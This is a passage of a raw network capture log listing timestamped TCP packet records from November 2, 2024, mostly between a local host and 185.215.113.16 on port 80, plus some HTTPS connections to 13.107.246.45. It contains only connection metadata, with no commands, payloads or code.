                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603346109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603363037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603363037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603375912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603383064 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603387117 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603400946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603404999 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603414059 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603425980 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603430033 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603441000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603441954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603466988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603482008 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603543043 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603558064 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603569031 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603574038 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603580952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603595018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603600979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603610992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603617907 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603621960 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603636980 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603662014 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603729010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603739023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603749037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603759050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603773117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603776932 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603785992 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603789091 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603801966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603811026 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603817940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603832006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603837013 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603841066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603854895 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603864908 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603863955 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603883982 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603895903 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603897095 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603909016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603919983 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603934050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603945017 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.603957891 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604043007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604053974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604063988 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604074955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604084015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604087114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604098082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604108095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604110956 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604124069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604127884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604135990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604141951 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604149103 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604163885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604170084 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604175091 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604186058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604201078 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604209900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604227066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604233980 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604240894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604250908 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604259968 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604274988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604279041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604290962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604300976 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604301929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604311943 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604329109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604381084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604392052 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604408026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604418039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604422092 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604429007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604439974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604446888 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604470015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604602098 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604612112 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604623079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604633093 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604644060 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604664087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604721069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604732037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604742050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604752064 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604763985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604774952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604788065 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604790926 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604800940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604811907 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604825020 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604825974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604846954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604851961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604862928 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604876995 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604948044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604964018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604974985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604984999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604995966 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.604995966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605010986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605021000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605024099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605034113 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605036020 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605057001 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605077028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605088949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605098009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605108023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605119944 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605125904 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605143070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605158091 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605179071 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605189085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605199099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605214119 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605233908 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605235100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605247021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605257988 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605268955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605276108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605283022 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605293989 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605299950 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605304956 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605313063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605318069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605336905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605357885 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605392933 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605402946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605412960 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605427027 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605429888 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605443954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605446100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605458975 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605463982 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605468035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605477095 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605490923 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605504036 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605515003 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605525970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605537891 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605557919 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605578899 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605690956 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605700970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605710983 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605720997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605732918 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605734110 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605742931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605746031 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605752945 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605765104 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605765104 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605789900 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.605806112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.651304960 CET4436383713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.651366949 CET4436383713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.651422024 CET63837443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.652012110 CET63837443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.652029991 CET4436383713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.652040958 CET63837443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.652045965 CET4436383713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.655916929 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.655982971 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.656088114 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.656963110 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.656996012 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.665806055 CET4436383513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.665920019 CET4436383513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.666039944 CET63835443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.666148901 CET63835443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.666166067 CET4436383513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.666176081 CET63835443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.666181087 CET4436383513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.668994904 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.669032097 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.669090986 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.669193029 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.669212103 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683484077 CET4436383813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683517933 CET4436383813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683559895 CET63838443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683561087 CET4436383813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683602095 CET63838443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683741093 CET63838443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683753967 CET4436383813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683763981 CET63838443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.683768988 CET4436383813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.687504053 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.687517881 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.687568903 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.687711000 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.687725067 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695466995 CET4436383613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695604086 CET4436383613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695739031 CET63836443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695766926 CET63836443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695776939 CET4436383613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695787907 CET63836443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.695791960 CET4436383613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.698328972 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.698360920 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.698489904 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.699704885 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.699721098 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769486904 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769542933 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769563913 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769575119 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769587040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769596100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769598961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769617081 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769623041 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769629002 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769640923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769644976 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769653082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769661903 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769673109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769675970 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769686937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769700050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769721031 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769757986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769793034 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769819021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769829035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769851923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769860983 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769862890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769874096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769890070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.769912958 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770093918 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770103931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770119905 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770132065 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770140886 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770143986 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770152092 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770155907 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770173073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.770179987 CET6381980192.168.2.4185.215.113.16
